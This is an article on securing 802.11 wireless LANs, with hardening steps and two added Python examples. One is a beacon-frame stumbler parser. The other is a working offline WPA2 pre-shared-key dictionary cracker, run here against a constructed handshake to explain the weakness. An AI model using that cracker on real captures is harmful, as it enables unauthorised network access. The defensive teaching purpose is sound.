By Kevin Beaver, CISSP
The latest craze in IT is to deploy IEEE 802.11-based wireless
local area networks (WLANs). Vendors are touting how WLANs can increase
productivity in the workplace, and users are shouting that they want more freedom
to roam around the office. As with most newfound technologies, everyone
from corporate executives to small business owners is reading about these
wireless perks and, as we've come to discover, people everywhere are setting
up wireless network connectivity wherever they can find an available network
drop.
It's no secret that the growing WLAN industry has had its
stumbling blocks. It seems that a major security vulnerability has been
found every few weeks since 802.11b WLANs started becoming popular back
in the year 2000. Although the various 802.11 security concerns have made
many people think twice about integrating WLANs into their environment,
it hasn't stopped most people who are interested in the technology and
believe it does indeed offer business value. That's a good thing because
the problems aren't as serious as they're made out to be; that is, if
security is taken seriously.
Why Wireless Security Is a Problem
The underlying security issue with WLANs is that there are no
physical boundaries protecting the network, as there are with our traditional
wired counterparts. Radio signals leak out into parking lots and adjacent
floors, which makes it tricky to keep the snoopers out. Another issue
we face with WLAN security is that we're forced to secure a system that
has a weak foundation. The 802.11 standard wasn't built from the ground
up to have the utmost in security features. Having said that, it was designed
with security in mind - something we can't say for most new technologies
and software programs. However, its security still relies on many of the
same weak mechanisms that have plagued computers for years - passwords,
outdated encryption algorithms, unapplied patches, and, worst of all, no security
settings enabled by default.
While we're on the subject of wireless vulnerabilities,
let's take a look at how a WLAN with common default settings can be easily
compromised. Here's a scenario:
- A new AP is broadcasting its default service set identifier (SSID)
out into the air - this is basically the wireless network name that,
when programmed into wireless client computers, allows users to connect
to the wireless network.
- Anyone with a wireless computer running stumbling software such as
Network Stumbler, a wireless network analyzer (a.k.a. sniffer) such
as AiroPeek, the wireless client management software that came with their
wireless card, or just the built-in client in Windows XP can see this SSID and attach to the
network. Technically, the SSID doesn't even have to be broadcast to
be captured - it also appears in the probe and association frames that legitimate
clients send when they connect - but I'll keep this simple.
- The broadcasting of the SSID is facilitated by the use of an omni-directional
antenna - which practically all APs have by default. This antenna sends
out radio signals in every direction - including nearby parking lots,
buildings, and streets, making it easier for a malicious hacker to grab
the SSID out of the air.
- At this point, the hacker can capture packets out of the air using
a wireless sniffer and, because nothing is encrypted, read anything and everything going across the
WLAN in the clear - emails, web traffic, files being saved to the network, the options
are endless.
- If the hacker wants to hop onto the network and browse around on workstations,
servers, or even the Internet, all he has to do is grab an IP address
for his computer. This process is usually facilitated by an internal
DHCP server that's handing out addresses freely or even by the AP itself.
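Here is what that first reconnaissance step looks like in code. This is an added example, not code from the original article: it parses 802.11 beacon frames the way a stumbler does and reports, per access point, the BSSID, the SSID (or the fact that SSID broadcast is disabled), and whether the AP is open, WEP, WPA or WPA2 and which cipher and key-management suites it advertises. The sample frames, the MAC addresses and the list of factory-default SSIDs are constructed for the example; the frame layout, the capability bits and the information-element numbers are those of the 802.11 standard. The same parser is the check to run after hardening an AP, since it shows exactly what the AP is telling the parking lot.

```python
import struct

# Selector type numbers for cipher suites and AKMs. The RSN (WPA2) element uses
# OUI 00-0F-AC; the vendor-specific WPA element uses OUI 00-50-F2 with the same numbering.
CIPHERS = {1: "WEP-40", 2: "TKIP", 4: "CCMP", 5: "WEP-104"}
AKMS = {1: "802.1X", 2: "PSK"}
RSN_OUI, WPA_OUI = b"\x00\x0f\xac", b"\x00\x50\xf2"
# Factory SSIDs seen on common consumer gear (assumed list for this example).
DEFAULT_SSIDS = {"linksys", "default", "NETGEAR", "dlink", "tsunami", "WLAN"}


def parse_ies(body):
    """Split the tagged-parameter area into (tag, value) pairs, stopping at a truncated element."""
    ies, i = [], 0
    while i + 2 <= len(body):
        tag, length = body[i], body[i + 1]
        value = body[i + 2:i + 2 + length]
        if len(value) < length:
            break
        ies.append((tag, value))
        i += 2 + length
    return ies


def parse_suite_list(data, pos, oui, table):
    """Read a 2-byte count followed by 4-byte selectors (OUI + type); return (names, next position)."""
    count = struct.unpack_from("<H", data, pos)[0]
    pos += 2
    names = []
    for _ in range(count):
        sel = data[pos:pos + 4]
        pos += 4
        names.append(table.get(sel[3], "type%d" % sel[3]) if sel[:3] == oui else "vendor")
    return names, pos


def classify_beacon(frame):
    """Return what a wardriver learns from one beacon: BSSID, SSID (or hidden), and the security mode."""
    if len(frame) < 36 or (frame[0] & 0xFC) != 0x80:        # management frame, subtype beacon
        raise ValueError("not an 802.11 beacon frame")
    bssid = ":".join("%02x" % b for b in frame[16:22])       # Address 3 of a beacon is the BSSID
    capability = struct.unpack_from("<H", frame, 34)[0]     # after 8-byte timestamp and 2-byte interval
    privacy = bool(capability & 0x0010)                     # bit 4: data frames are encrypted
    info = {"bssid": bssid, "ssid": None, "hidden": False,
            "security": "WEP" if privacy else "Open", "suites": ""}
    for tag, value in parse_ies(frame[36:]):
        if tag == 0:                                        # SSID element
            if not any(value):                              # zero-length or all-NUL: broadcast disabled
                info["hidden"] = True
            else:
                info["ssid"] = value.decode("utf-8", "replace")
        elif tag == 48:                                     # RSN element: WPA2 (802.11i)
            pairwise, pos = parse_suite_list(value, 6, RSN_OUI, CIPHERS)   # skip version, group cipher
            akm, _ = parse_suite_list(value, pos, RSN_OUI, AKMS)
            info["security"], info["suites"] = "WPA2", "/".join(pairwise) + " " + "/".join(akm)
        elif tag == 221 and value[:4] == WPA_OUI + b"\x01" and info["security"] != "WPA2":
            pairwise, pos = parse_suite_list(value, 10, WPA_OUI, CIPHERS)  # skip OUI/type, version, group
            akm, _ = parse_suite_list(value, pos, WPA_OUI, AKMS)
            info["security"], info["suites"] = "WPA", "/".join(pairwise) + " " + "/".join(akm)
    info["default_ssid"] = info["ssid"] in DEFAULT_SSIDS
    return info


def build_beacon(bssid, ssid, privacy, extra_ies=b""):
    """Constructed beacon (not a real capture): 24-byte MAC header, fixed fields, SSID element, extras."""
    header = b"\x80\x00\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x00\x00"
    capability = 0x0001 | (0x0010 if privacy else 0)        # ESS bit, plus Privacy when encrypting
    fixed = struct.pack("<QHH", 0, 100, capability)         # timestamp, beacon interval (TUs), capability
    return header + fixed + bytes([0, len(ssid)]) + ssid + extra_ies


# RSN element advertising CCMP pairwise/group cipher with PSK key management (WPA2-Personal).
RSN_PSK_CCMP = (bytes([48, 20]) + struct.pack("<H", 1) + RSN_OUI + b"\x04"
                + struct.pack("<H", 1) + RSN_OUI + b"\x04"
                + struct.pack("<H", 1) + RSN_OUI + b"\x02" + b"\x00\x00")
# Vendor-specific WPA element advertising TKIP with PSK key management (WPA-Personal).
WPA_PSK_TKIP = (bytes([221, 22]) + WPA_OUI + b"\x01" + struct.pack("<H", 1) + WPA_OUI + b"\x02"
                + struct.pack("<H", 1) + WPA_OUI + b"\x02"
                + struct.pack("<H", 1) + WPA_OUI + b"\x02")

# Four constructed access points: factory default and open, WEP with a telling name,
# hidden SSID with WPA2-PSK, and WPA-PSK with TKIP.
SAMPLE_BEACONS = [
    build_beacon(bytes.fromhex("001122334401"), b"linksys", privacy=False),
    build_beacon(bytes.fromhex("001122334402"), b"ACME-Finance", privacy=True),
    build_beacon(bytes.fromhex("001122334403"), b"", privacy=True, extra_ies=RSN_PSK_CCMP),
    build_beacon(bytes.fromhex("001122334404"), b"guest", privacy=True, extra_ies=WPA_PSK_TKIP),
]


def survey(frames):
    """Classify every beacon in a capture."""
    return [classify_beacon(f) for f in frames]


if __name__ == "__main__":
    for ap in survey(SAMPLE_BEACONS):
        print(ap)
```

Feed it frames from a monitor-mode capture (with any radiotap header stripped) and the "Open" and "WEP" rows, plus anything with `default_ssid` set, are the APs in the scenario above. Note that the hidden-SSID AP is still fully visible as a BSSID with a security mode; only the name is withheld, and that name shows up as soon as a legitimate client associates.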
That's all there is to someone connecting to a vulnerable
WLAN. The sad thing is that this is going on all over the world - all
day, every day. Computers are getting broken into, information integrity
is being compromised, confidential information is being stolen, bandwidth
is being consumed, and spam and other illegal servers are being set up
and run across these compromised networks. Just imagine the possibilities.
Imagine the liabilities!
If MAC address filtering was enabled on this AP, which only
allows certain computers to attach to the WLAN, it can be defeated fairly
easily: MAC addresses travel in the clear in every frame, so the attacker
simply programs his wireless card to use a valid address he finds by
sniffing the airwaves. This still adds a layer of
security. If WEP encryption was enabled, the attacker can capture enough wireless
packets to recover the key - the weakness is in WEP's reuse of RC4 keystreams,
not in the key itself, so a hard-to-guess key only delays him - but this is yet another
layer of protection. If Wi-Fi Protected Access (WPA) or WPA2 (the Wi-Fi Alliance's
certification of IEEE 802.11i) is enabled with a long, random pre-shared passphrase,
then pretty much all bets are off, especially if these mechanisms are layered on top of the previously
mentioned security options. The one caveat is the passphrase: a short or
dictionary-word passphrase can be guessed offline from a captured handshake.
So, having said all this, if all 802.11-supported security
features were enabled on WLAN devices out of the box, we wouldn't have
the common security problems we see with the majority of wireless installations.
The problem is that the WLAN vendors don't (and probably never will) enable
all the security features that are available. They're focusing on basic
feature sets, time to market, and ease of use. The onus to secure wireless
systems is placed on the end user, which, as we're now seeing, is rarely
a good idea. It's easy to comment on this issue, but, all things considered,
there's not a great solution - especially now that the cat's out of the
bag so to speak. Let's look at some basic remedies to this problem.
The Technical Fixes Are Pretty Simple
With regard to wireless security, the focus should be on three main areas:
- Securing APs
- Securing wireless clients
- Securing the traffic between the two
It seems complex at first, but it's actually really easy
to address these areas and set up a secure WLAN. Here are ten simple steps
for doing this that you can perform yourself if you'd like. All it takes
are your wireless user's guides for specific instructions and some basic
computer knowledge.
- Change the default SSID on your APs - make it something obscure that
doesn't give away any private information relating to what it's used
for, such as department, company name, etc.
- Disable the broadcasting of the SSID. Most enterprise-worthy APs have
this feature. Your legitimate wireless clients don't need the
SSID broadcast, since you know what it is when it comes time
to get them on the network. Keep in mind that this only hides the network
from casual browsing: as noted above, the SSID still appears in the frames your
own clients send when they connect, so treat it as a nuisance for the attacker,
not as a secret.
- Change default passwords and IP addresses. This in itself can eliminate
a large portion of your vulnerabilities.
- Replace each of your omni-directional antennas with directional antennas
wherever possible. This will keep your wireless radio waves from going
where they don't belong.
- Reduce the transmission power of the radio signals in your APs if
possible. Choose the lowest setting that allows proper coverage and
throughput.
- Place your APs in a protected network segment - either outside your firewall
or in a DMZ. Never plug an AP directly into the trusted side of the firewall
if you can help it; doing so lets anyone who associates with the AP bypass the
firewall completely.
- Enable MAC address controls on your AP if you have a reasonably small
WLAN. Otherwise, this can be too difficult to manage.
- Enable WEP encryption if it's the strongest your hardware supports, use a
difficult-to-guess key, and change the key on a regular basis. Understand that
WEP's flaws are in the protocol, so a strong key and frequent rotation only
shorten the window in which a recovered key is useful; they don't prevent the recovery.
- Apply the latest firmware patches to your APs on a regular basis.
- Install personal firewall software on your wireless clients and ensure
they're patched on a regular basis.
If you want the utmost in security, enable WPA or, better, WPA2
if your hardware supports it, and pick a long, random pre-shared passphrase.
With a pre-shared key, WPA's protection is only as good as that passphrase,
because an attacker who captures the handshake can test guesses offline.
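To see why steps 1 and 10 go together, here is an added example (not code from the original article) that derives the WPA2 pairwise master key exactly as IEEE 802.11i specifies and then runs an offline dictionary guess against message 2 of a four-way handshake. The SSID, MAC addresses, nonces, wordlist and the passphrase used to fabricate the captured message are assumptions constructed for the example; the PBKDF2 key derivation, the PTK pseudo-random function and the EAPOL-Key MIC computation follow the standard.

```python
import hashlib
import hmac
import struct


def pmk_from_passphrase(passphrase, ssid):
    """PMK per IEEE 802.11i Annex H: PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds, 256 bits."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_kck(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF(PMK, "Pairwise key expansion", min/max of the MACs and nonces); KCK is its first 16 bytes."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)[:16]


MIC_OFFSET = 81   # 4-byte EAPOL header + 77 bytes of Key-descriptor fields precede the MIC


def eapol_mic(kck, frame):
    """Key descriptor version 2 (AES/CCMP): HMAC-SHA1 over the frame with the MIC zeroed, cut to 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(kck, snonce):
    """Constructed message 2 of the 4-way handshake (no key data), as a supplicant would send it."""
    frame = bytearray(b"\x01\x03" + struct.pack(">H", 95))  # EAPOL v1, type Key, body length
    frame += b"\x02\x01\x0a\x00\x10"                         # RSN descriptor; key info v2+pairwise+MIC; key len 16
    frame += b"\x00" * 7 + b"\x01"                           # replay counter
    frame += snonce + b"\x00" * 32                           # SNonce, then IV / RSC / ID all zero
    frame += b"\x00" * 16 + b"\x00\x00"                      # MIC placeholder, key data length 0
    frame[MIC_OFFSET:MIC_OFFSET + 16] = eapol_mic(kck, bytes(frame))
    return bytes(frame)


# Constructed capture (not real traffic): SSID, MACs and ANonce come from the beacon and message 1,
# the SNonce and MIC from message 2. The passphrase below is used only to fabricate it.
CAPTURE = {
    "ssid": "ACME-Finance",
    "ap_mac": bytes.fromhex("001122334402"),
    "sta_mac": bytes.fromhex("0a1b2c3d4e5f"),
    "anonce": bytes(range(32)),
    "snonce": bytes(range(32, 64)),
}
CAPTURE["msg2"] = build_msg2(
    derive_kck(pmk_from_passphrase("Summer2005!", CAPTURE["ssid"]), CAPTURE["ap_mac"],
               CAPTURE["sta_mac"], CAPTURE["anonce"], CAPTURE["snonce"]),
    CAPTURE["snonce"])


def check_passphrase(guess, capture):
    """True if the guess reproduces the MIC carried on the captured message 2."""
    kck = derive_kck(pmk_from_passphrase(guess, capture["ssid"]), capture["ap_mac"],
                     capture["sta_mac"], capture["anonce"], capture["snonce"])
    mic = capture["msg2"][MIC_OFFSET:MIC_OFFSET + 16]
    return hmac.compare_digest(eapol_mic(kck, capture["msg2"]), mic)


def dictionary_attack(wordlist, capture=CAPTURE):
    """Offline guessing: one PBKDF2 (4096 SHA-1 rounds) per word and no further contact with the AP."""
    for guess in wordlist:
        if check_passphrase(guess, capture):
            return guess
    return None


WORDLIST = ["password", "linksys", "admin", "Summer2005!", "letmein"]   # constructed


if __name__ == "__main__":
    print(dictionary_attack(WORDLIST))
```

Two things fall out of the derivation. The SSID is the salt for the PMK, so an AP left on its factory SSID can be attacked with precomputed tables, which is one more reason for step 1. And the only cost the attacker pays per guess is the 4096-round PBKDF2, so a passphrase drawn from a wordlist falls quickly while a long random one does not; where the hardware supports 802.1X authentication instead of a pre-shared key, there is no shared passphrase to guess at all.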
That's it - regardless of what the WLAN vendors claim, reasonable
WLAN security can be attained even if you just go with the basics. Doing
so will put you way ahead of the crowd so when an attacker does come your
way, he'll likely go down the path of least resistance - that is, someone
else's WLAN that doesn't have these settings enabled and is much easier
to break into. Don't get me wrong - I'm not saying that your WLAN will
be completely impenetrable to someone that's determined enough - but time
is on your side. The more layers of security (or hoops to jump through)
you set up, the more difficult it will be and the more time it will take
a hacker to break in. If you tire them out enough, they'll likely move
on to someone else.
Inherent Weaknesses Are Here to Stay
Even if we worked in an ideal world and all known 802.11 security vulnerabilities
went away, we'd still have the human factor to deal with. It's easy for
us to blame technical security problems on inanimate objects like APs
and wireless laptops, but the true problem lies within ourselves. Human
oversight, error, and carelessness lie at the root of most information
security issues. With employees installing rogue APs on corporate networks,
technicians installing the wrong type of antennas that send wireless signals
outside their buildings, and network administrators forgetting to enable
even the most basic wireless security features in the first place, we
have much bigger problems to worry about than whether or not WEP encryption
can be cracked, some authentication system can be broken, or wireless
radio signals can be jammed.
Inherent WLAN weaknesses are here to stay, but that's quite
alright. If you take reasonable and practical precautions, you'll be ahead
of the curve and less of a target moving forward. A great quote from Chuck
Yeager applies to WLAN security: "You don't concentrate on risks. You
concentrate on results. No risk is too great to prevent the necessary
job from getting done." If you need wireless network connectivity
inside your organization, go for it! If you proceed with caution, take
reasonable steps towards implementing the security basics, remember the
human factors that pose the greatest risks, and remain vigilant, you'll
be quite alright.
About the Author
Kevin Beaver is an independent information security
consultant, author, and speaker with Atlanta-based Principle Logic, LLC
where he specializes in information security assessments for those who
take security seriously and incident response for those who don't. He
is author of the highly-successful book Hacking For Dummies and co-author
of the new book Hacking Wireless Networks For Dummies, both by
Wiley Publishing. Kevin also wrote the free ebook The Definitive Guide
to Email Management and Security by Realtimepublishers.com and co-authored
the book The Practical Guide to HIPAA Privacy and Security Compliance
by Auerbach Publications. He can be reached at kbeaver@principlelogic.com.